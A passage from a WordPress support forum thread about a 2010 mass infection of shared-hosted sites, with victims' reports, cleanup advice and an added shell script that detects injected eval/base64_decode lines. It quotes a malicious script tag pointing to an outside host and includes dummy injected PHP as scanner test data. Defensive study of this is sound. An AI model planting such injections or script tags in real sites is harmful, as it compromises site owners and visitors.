
2.9.2 site hacked

  • I visited my WP 2.9.2 site today to get a warning about my site having malware associated with it. Looking at the source, I see a script entry in the HTML body going to http://zettapetta.com/js.php

    Looking at the index.php file, I see that the first line has been hacked with an eval command and a lot of garbage that obviously comprises part of the hack. The timestamps of a lot of WP files have been changed, indicating that they were modified sometime yesterday afternoon.

    Anyone else seen this hack yet; is there a fix? I only found one or two mentions of this online, but all my plugins are up to date and I’m not sure how to ensure this won’t happen again after I do a restore from backup on the site.

    Thanks,
    Matt

Viewing 15 replies - 16 through 30 (of 187 total)
  • Daniel Cid

    @ddsucurinet

    Sucuri.net Support

    clundie: wow… On a site without wordpress?

    Yes, never had WordPress installed on my site. Just a few .php files written by me, on a mostly static site. I don’t have scripts to allow file uploads or anything like that. All the .php files got modified as described above. Now – my site is on shared hosting, so it’s possible a WordPress site was hosted on the same server. My file permissions were set so that only I (the owner) could write/modify them, but maybe someone figured out how to bypass that. In any case I changed all my passwords, which were strong and unique. I also use a Mac & there is zero chance of a virus on it. Ironically I was already planning to leave Godaddy next week.

    This script has been placed somewhere in the code that pulls my rss feed and I can’t find it. Help!

    <script src="http://indesignstudioinfo.com/ls.php"></script>

    If you try to pull my feed, that’s the error you get (www.thenewpioneersquare.com/feed) and I can’t find the file that the code is in. I’ve fixed all of my other files, but this is nowhere.

    Does anyone know where I can find the file to remove this code? I’ve been looking in files for the past 2 hours and have found nothing so far.

    Thanks!!!!

    Moderator James Huff

    @macmanx

    From what I read on the other forums, chmod-ing the files to non-‘open’ should help.

    FTP and File Manager access down now at NS. At least on our server. Can’t access my own files.

    Says my own password and user ID is incorrect.

    Total chaos.

    Daniel Cid

    @ddsucurinet

    Sucuri.net Support

    jkelly11: This file is hidden from an encoded PHP string on all your files.

    You can get more info here:
    http://sucuri.net/malware/entry/MW:MROBH:1

    Be cautious, people have been getting infected just by checking their own sites.

    Thanks @dd — I’ve deleted a lot of that code in the php string (in my case, it infected all of my .php files), so I don’t understand why I’m still getting the error on my rss feed.

    Are you not able to just delete the inserted code and clean it up?

    I’m a little nervous to do the whole backup, erase, redo (because of how new I am to wordpress). I was hoping to take care of it by just finding the code.

    dd@sucuri.net

    The problem is the criminals are launching everything in the book at us. It’s like dodging bullets at this point. You clean up, and then another surprise shows up out of nowhere totally unrelated to the previous hack and a completely new technique.

    They are getting a hold of and compromising everything. Mail, FTP, Site, etc., etc.

    And who the heck knows what else at this point.

    Daniel Cid

    @ddsucurinet

    Sucuri.net Support

    jkelly11: You probably missed a file or two. Especially inside the themes, wp-includes or plugins. Shoot me an email and I can send a script to automatically do it for you.
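    The original post describes the infection as an eval() of an encoded string prepended to index.php with many WP files re-timestamped, and the reply above notes that copies are easily missed in themes, wp-includes or plugins. The following is an added example, not code from this thread, from WordPress or from Sucuri: a POSIX shell scanner that flags .php files whose opening lines match that pattern and lists recently modified files, using a constructed sample tree (dummy base64, not the real payload).

```shell
#!/bin/sh
# Added example (not from the thread, WordPress or Sucuri). Flags PHP files
# whose opening lines carry an injected eval() of an encoded payload and
# lists .php files modified recently. Sample tree below is constructed.

# eval( followed on the same line by a common decoder call.
INJECT_RE='eval\(.*(base64_decode|gzinflate|str_rot13|gzuncompress)\('

# Exit 0 when the first three lines of FILE match INJECT_RE.
is_injected_php() {
    head -n 3 "$1" | grep -qE "$INJECT_RE"
}

# Print "<path>: <first 70 chars of the suspicious line>" for every
# .php file under DIR that matches; prints nothing for a clean tree.
scan_injected_php() {
    find "$1" -type f -name '*.php' | sort | while IFS= read -r f; do
        if is_injected_php "$f"; then
            line=$(head -n 3 "$f" | grep -E "$INJECT_RE" | head -n 1 | cut -c1-70)
            printf '%s: %s\n' "$f" "$line"
        fi
    done
}

# List .php files under DIR modified within the last DAYS days, to cross-
# check the burst of timestamp changes the original post mentions.
recently_modified_php() {
    find "$1" -type f -name '*.php' -mtime "-$2" | sort
}

# Constructed sample tree: one clean file and two infected ones, one of
# them inside wp-includes/ where copies tend to be overlooked.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-includes"
    printf '<?php\n// clean file\necho "hello";\n' > "$d/clean.php"
    printf '<?php eval(base64_decode("aGVsbG8gd29ybGQ=")); ?>\n<?php\necho "site";\n' > "$d/index.php"
    printf '<?php\neval(gzinflate(base64_decode("ZG9udA==")));\n' > "$d/wp-includes/load.php"
    printf '%s\n' "$d"
}

# Usage: sh scan.sh /path/to/site   (with no argument only the functions are defined)
if [ "$#" -gt 0 ]; then
    scan_injected_php "$1"
    echo "--- .php files modified in the last 2 days ---"
    recently_modified_php "$1" 2
fi
```

Flagged files should be restored from a known-clean backup or the upstream WordPress release rather than edited by hand, and the scan repeated afterwards since the thread reports reinfection from missed copies.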

    Error: Authentication failed.
    Error: Critical error
    Error: Could not connect to server

    Obviously you can’t check and try to protect your web site assets either when SFTP returns this all day.

    Go Daddy

    @gdhosting

    Go Daddy Support

    @clundie
    This is not necessarily specific to WordPress, that’s just one of the more popular apps. The real concern is insecure PHP code, which is more likely to exist in apps that haven’t been properly updated.

    If there’s another installation that’s been exploited in the same hosting account, it could affect your other sites, but not across accounts or across customers on the same server.

    Our security team can take a look by submitting your information here: http://fwd4.me/Mrd

    Alicia

    Daniel Cid

    @ddsucurinet

    Sucuri.net Support

    Hey all,

    Simple script to automatically clean this up for you:

    http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

    I just cleaned a few sites using it and it takes less than 5 minutes.

    Worked a little bit. Please check the comment I left on your post. Thanks!

The topic ‘2.9.2 site hacked’ is closed to new replies.